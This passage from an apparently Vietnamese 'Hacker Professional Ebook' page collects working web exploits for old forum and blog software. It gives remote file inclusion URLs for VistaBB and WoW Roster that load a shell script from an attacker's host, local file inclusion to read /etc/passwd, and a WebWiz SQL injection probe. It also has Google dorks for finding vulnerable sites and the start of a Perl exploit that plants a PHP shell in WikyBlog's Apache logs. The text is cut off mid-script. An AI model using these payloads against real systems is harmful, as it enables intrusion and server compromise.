Hacker Professional Ebook part 438 doc

Hoặc exploit bằng tay : Trích: GET -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FI LE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_us

Hoặc exploit bằng tay :

Trích:

GET ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FI LE]

EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http ://yoursite.com/cmd.txt?

EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/ passwd%00 <- mq off

GET ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE] EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yo ursite.com/cmd.txt?

EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/pas swd%00 <- mq off

Ask Google : "Powered by VistaBB"

Còn đây là Source cho những ai muốn ngâm kíu hoặc "dùng thử"

http://www.vistabb.net/dosyalar/zip_vistabb_v2060.zip

navaro(HCE)

Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability

Code:

-

Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities

##################################################################

#############

Discovered By Skulmatic

-

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : World of Warcraft (WoW) Roster

URL : http://www.wowroster.net/

-

dork : "wow roster version 1.5.*"

Exploit :

http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd

=ls

-

greatz:

~~~~

# special to song hye kyo (for inspiration)

# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster

-

Contact:

~~~~~~

Nick: skulmatic

E-mail: skulmatic[at]gmail[dot]Com

- [ eof ] -

# milw0rm.com [2006-08-01]

vns3curity(HCE)

Webwiz SQL Injection

-Version: All

-PoC:

site/forumpath/search.asp?KM='

Have fun!

Marriotvn(HCE)

Webwiz SQL Injection

-Version: All

-PoC:

site/forumpath/search.asp?KM='

Have fun!

Marriotvn(HCE)

WikyBlog 1.3.2 (include/WBmap.php) Local File Inclusion

Code:

##################################################################

###############################

# r0ut3r Presents #

# #

# Another r0ut3r discovery! #

# writ3r [at] gmail.com #

# #

# WikyBlog Local File Inclusion Exploit #

################################################################## ############################### # Software: WikyBlog 1.3 #

# #

# Vendor: http://www.wikyblog.com/ #

# #

# Released: 2006/12/01 #

# #

# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)

# # #

# Note: The information provided in this document is for WikyBlog administrator

# # testing purposes only! #

# #

# This exploit makes use of a local file inclusion exploit in #

# WikyBlog to allow command execution Firstly it locates an

# # access_log, or error_log then it inserts a PHP Shell into #

# the log file and returns a link for command execution #

# #

# include/WBmap.php?l=file_to_include%00 #

# register_globals being on does not affect this vulnerability #

################################################################## ############################### use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /wikyblog/ sub Header() { print q {################################################################# ################################ # r0ut3r Presents #

# #

# Another r0ut3r discovery! #

# writ3r [at] gmail.com #

# #

# WikyBlog Local File Inclusion Exploit #

##################################################################

###############################

};

}

sub Usage()

{

print q {Usage: wikyblogxpl1.3.pl [target] [folder]

Example: wikyblogxpl1.3.pl localhost /wikyblog/

};

exit();

}

Header();

if (!$target || !$folder) {

Usage(); }

# log list taken from Kacper's http://www.milw0rm.com/exploits/2253

@paths=(

" / / / / /var/log/httpd/access_log",

" / / / / /var/log/httpd/error_log",

" /apache/logs/error.log",

" /apache/logs/access.log",

" / /apache/logs/error.log",

" / /apache/logs/access.log",

" / / /apache/logs/error.log",

" / / /apache/logs/access.log",

" / / / /apache/logs/error.log",

" / / / /apache/logs/access.log",

" / / / / /apache/logs/error.log",

" / / / / /apache/logs/access.log",

" /logs/error.log",

" /logs/access.log",

" / /logs/error.log",

" / /logs/access.log",

" / / /logs/error.log",

" / / /logs/access.log",

" / / / /logs/error.log",

" / / / /logs/access.log",

" / / / / /logs/error.log",

" / / / / /logs/access.log",

" / / / / /etc/httpd/logs/access_log",

" / / / / /etc/httpd/logs/access.log",

" / / / / /etc/httpd/logs/error_log",

" / / / / /etc/httpd/logs/error.log",

" / / / / /var/www/logs/access_log",

" / / / / /var/www/logs/access.log",

" / / / / /usr/local/apache/logs/access_log",

" / / / / /usr/local/apache/logs/access.log",

" / / / / /var/log/apache/access_log",

" / / / / /var/log/apache/access.log",

" / / / / /var/log/access_log",

" / / / / /var/www/logs/error_log",

" / / / / /var/www/logs/error.log",

" / / / / /usr/local/apache/logs/error_log",

" / / / / /usr/local/apache/logs/error.log",

" / / / / /var/log/apache/error_log",

" / / / / /var/log/apache/error.log",

" / / / / /var/log/access_log",

" / / / / /var/log/error_log"

);

print "[+] Attempting to locate log file\n";

$log = "";

foreach $path (@paths)

{